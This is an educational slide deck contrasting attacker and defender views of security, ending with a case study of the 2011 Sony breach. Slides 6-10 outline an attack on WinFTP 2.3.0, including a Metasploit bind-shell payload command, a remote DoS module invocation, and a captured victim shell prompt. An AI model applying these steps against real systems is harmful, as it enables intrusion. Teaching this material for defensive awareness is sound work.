Upload
jonathan-sinclair
View
117
Download
1
Embed Size (px)
Citation preview
Breach Analysis - Jonathan Sinclair 1
Breach Analysis - Insights from technical breach to protective measures
By J.Sinclair
Breach Analysis - Jonathan Sinclair 2
Talk Outcomes
• Demonstrate security from two perspectives
– The goal of a Blackhat
– The goal of a Whitehat
• An introduction to tooling
Breach Analysis - Jonathan Sinclair 3
Perspectives
White vs. Black
Breach Analysis - Jonathan Sinclair 4
Blackhat Perspective• Motivating Factors – Like the challenge (dedication)– Self-promotion / Fame
• Want to improve security by showing it’s failing (grey see the work by: Tavis Ormandy)
– Money• Focus– Breaching security
• Penetration Testing• Exploit writing• Bug hunting• Social Engineering
Breach Analysis - Jonathan Sinclair 5
Where to start
• Follow a methodology /plan– Intelligence Gathering: Passive/Active– Vulnerability Analysis: Active– Exploitation: Active– Post Exploitation: Active– Reporting (Bad guys don’t care about this. It
leaves evidence)
Breach Analysis - Jonathan Sinclair 6
Steps of an attacker(Tools of the trade)
• Intelligence Gathering : Maltego, Social harvesting
• Reconnaissance:– Zenmap/Nmap – Find a service• Get the service listing:
– Telnet, smtp, https, printer, msrpc, irc, http-proxy, ftp• Query the services:
– Test login’s e.g. ftp, telnet, smtp• Identify software information:
– WinFTP version 2.3.0
Breach Analysis - Jonathan Sinclair 7
Steps of an attacker
• Exploit– Check exploit-db, NIST, metasploit, Nessus etc.– Set-up a lab environment– Download the app you want to exploit– Start fuzzing : test the application to simulate a
crash
Breach Analysis - Jonathan Sinclair 8
Steps of an attacker
• Attach to Immunity or your favourite debugger: OllyDbg, WinDbg, IdaPro
Breach Analysis - Jonathan Sinclair 9
Steps of an attacker
• Control the crash– Manipulate EIP via ECX and EDX– Jump to your shell code
• Generate via Metasploit:– msf payload(shell_bind_tcp) > generate -b '\x00\x44\x67\x66\xfa\
x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b‘
– Prep your exploit in Ruby– Launch at the target system
• ./msfconsole• use auxiliary/dos/windows/ftp/winftp230_remote• exploit
Breach Analysis - Jonathan Sinclair 10
Steps of an attacker
• Got shell – Bad guy wins– Starting interaction with 2... – Microsoft Windows XP [Version 5.1.2600] (C)
Copyright 1985-2001 Microsoft Corp. – C:\Documents and Settings\victim\Desktop>
Breach Analysis - Jonathan Sinclair 11
Access Granted
• Network security bi-passed
• Access of a single system can lead to additional breaches
• Pivot point (post-exploitation) for future attacks identified
Game Over
Breach Analysis - Jonathan Sinclair 12
Whitehat Perspective
• Motivating Factors – Secure your enterprise– Keep company assets and intellectual property safe– Engineer a secure solution– Fame (would be nice but rarely appreciated)
• Focus– Salary– Watching the bad guys– Staying current while maintaining the old
Breach Analysis - Jonathan Sinclair 13
Why it’s so hard to be good
• Security dilemma:– “The intruder only needs to exploit one of the
victims in order to compromise the enterprise.”• Security mantra:– “There is no perfect defence”
• Security solution – the 3 pillars:– Awareness– Process– Tools
Breach Analysis - Jonathan Sinclair 14
Security Awareness(1)
• Ensure people are educated– Set up awareness campaigns– Create training programmes– Bring security thinking to the people
• Relate to cultural differences (US vs. Switzerland)
Breach Analysis - Jonathan Sinclair 15
Security Awareness(2)
• Create a mind-set of critical thinking and encouraging people to ask the ‘what if..’ type questions
• Security thinking has nothing to do with being a techy. (Techies nearly always forget this)
Breach Analysis - Jonathan Sinclair 16
Security Process
• What is actually important to you?
– Know what you want
– Know what you’re risk appetite is
– Integrate security into everything you do
Breach Analysis - Jonathan Sinclair 17
Tooling
• Firewalls, IPS/IDS’s, DLP, SIEM, Antivirus etc. will only cover your last 20%
• Most incidents come from internal employees– Symantec figures (1996 – 2002) : 59%– CERT figures (2010) : 60%– Open Security Foundation (2010) : 47%
• Tools have vulnerabilities: Wireshark!
Breach Analysis - Jonathan Sinclair 18
Enterprise security
• The message: “Your organisation will be breached”
• What to consider– You need to know when this happens– You need to know how to contain it – You need to be able to understand your reputation
Breach Analysis - Jonathan Sinclair 19
Enterprise security: Sony
• Case Study:– Sony breach in 2011– 25 million personal details stolen from the Sony
Online Entertainment network• Name, Address, Email, DoB, Phone numbers
• Motive:– Unknown but potentially to sell on credit card
information (the hack didn’t reveal the 3-digit security code)
Breach Analysis - Jonathan Sinclair 20
Enterprise security: Sony
• Reaction by Sony– SOE network was suspended• SOE was then rebuilt
– Company would grant 30 days additional playing time to registered users
• Reaction by the public– Legal action brought against Sony– In the UK Sony was fined £250,000
Breach Analysis - Jonathan Sinclair 21
Enterprise security: Sony
• Overall cost– Profits plunged 59% or 15.5bn Yen as a combined
result of cyber breach and Japanese tsunami– Continued losses to the brand into 2012
• Real issues– Personal data lost– Credit card fraud became more prevalent
Breach Analysis - Jonathan Sinclair 22
Enterprise security: Final Thoughts
• Take away message:– The data a company may lose in a security breach
may not be ‘secret’ data e.g. IP, however reputation loss will ALWAYS cost an enterprise
• Security in an enterprise is about protecting reputation!
Breach Analysis - Jonathan Sinclair 23
Questions and Answers
?